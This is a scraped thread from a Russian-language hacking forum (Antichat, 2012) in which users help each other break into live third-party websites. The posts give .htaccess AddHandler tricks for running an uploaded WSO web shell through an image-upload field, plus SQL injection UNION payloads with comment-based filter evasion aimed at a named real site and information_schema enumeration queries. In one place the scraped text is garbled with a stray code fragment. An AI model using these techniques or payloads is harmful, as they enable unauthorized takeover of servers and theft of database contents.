ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.03.2012, 19:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
еще вопрос.
Надо залить шелл. В админке могу только редактировать новости, а в новостях добавлять картинки. При добавлении картинки все хорошо заливается, даже расширение .пхп. Заливается на сервер. НО когда я заливаю например wso.php и потом иду по ссылки картинки получаю The server encountered an internal error or misconfiguration and was unable to complete your request.
когда же заливаю шелл с расширением например .jpg то нормально переходит по ссылке, но шел не срабатывает.
Есть какие то еще варианты?
|
|
|
14.03.2012, 19:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Сообщение от kise
kise said:
Есть ли что-то более удобное или функциональное?
Уйма. Можешь юзать морковку, панголини, safe3, круизер в конце концов.
Но лично я пришел к выводу, что лучше рук ничего ещё не написали)
|
|
|
|
14.03.2012, 19:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Сообщение от jecka3000
jecka3000 said:
еще вопрос.
Надо залить шелл. В админке могу только редактировать новости, а в новостях добавлять картинки. При добавлении картинки все хорошо заливается, даже расширение .пхп. Заливается на сервер. НО когда я заливаю например wso.php и потом иду по ссылки картинки получаю The server encountered an internal error or misconfiguration and was unable to complete your request.
когда же заливаю шелл с расширением например .jpg то нормально переходит по ссылке, но шел не срабатывает.
Есть какие то еще варианты?
Залить .htaccses как вариант. Потм залить какой-то shell.ololovskiy и открыть как исполняемый.
|
|
|
|
14.03.2012, 19:36
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Сообщение от Pirotexnik
Pirotexnik said:
Залить .htaccses как вариант. Потм залить какой-то shell.ololovskiy и открыть как исполняемый.
ты имеешь в виду разрешить выполнение php файлов как картинку?
типа
Код:
Code:
AddType application/x-httpd-jpg .php
|
|
|
|
14.03.2012, 21:01
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
попробуй залить phpinfo(); и скажи что выйдет
если нет, то да, попробуй AddType application/x-httpd-jpg .ololo
и лей шелл.ololo
|
|
|
|
14.03.2012, 21:14
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Сообщение от faza02
faza02 said:
попробуй залить phpinfo(); и скажи что выйдет
если нет, то да, попробуй AddType application/x-httpd-jpg .ololo
и лей шелл.ololo
С пхп инфо не прокатило.
во втором случае просто выводит исходный код шелла, но не исполняет его
|
|
|
|
14.03.2012, 21:16
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
помогите обойти фильтр
jecka, php_flag engine 1
AddHandler application/x-httpd-php .ololo
|
|
|
|
14.03.2012, 21:39
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Сообщение от faza02
faza02 said:
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
помогите обойти фильтр
jecka, php_flag engine 1
AddHandler application/x-httpd-php .ololo
самое смешное, что и .htaccess как txt обрабатывается, т.е. при переходе на "картинку" вылетает содержимое htaccess..странно
|
|
|
|
14.03.2012, 21:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от faza02
faza02 said:
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
помогите обойти фильтр
jecka, php_flag engine 1
AddHandler application/x-httpd-php .ololo
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,table_name,3,4,5,6,78,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28+from+information _schema.`tables`+limit+1,1--+
и т.д.
%20 ток убери)
|
|
|
|
14.03.2012, 22:28
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Сообщение от OxoTnik
OxoTnik said:
Сообщение от Fooog
Fooog said:
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html " if author else f"
OxoTnik said:
Сообщение от Fooog
Fooog said:
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html Так точно. Но при:
1'+order+by+1+--
Выдает:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1
А при:
1'/**/order/**/by/**/1/**/--
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1
+GROUP+BY+1+--
Также не помогает.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид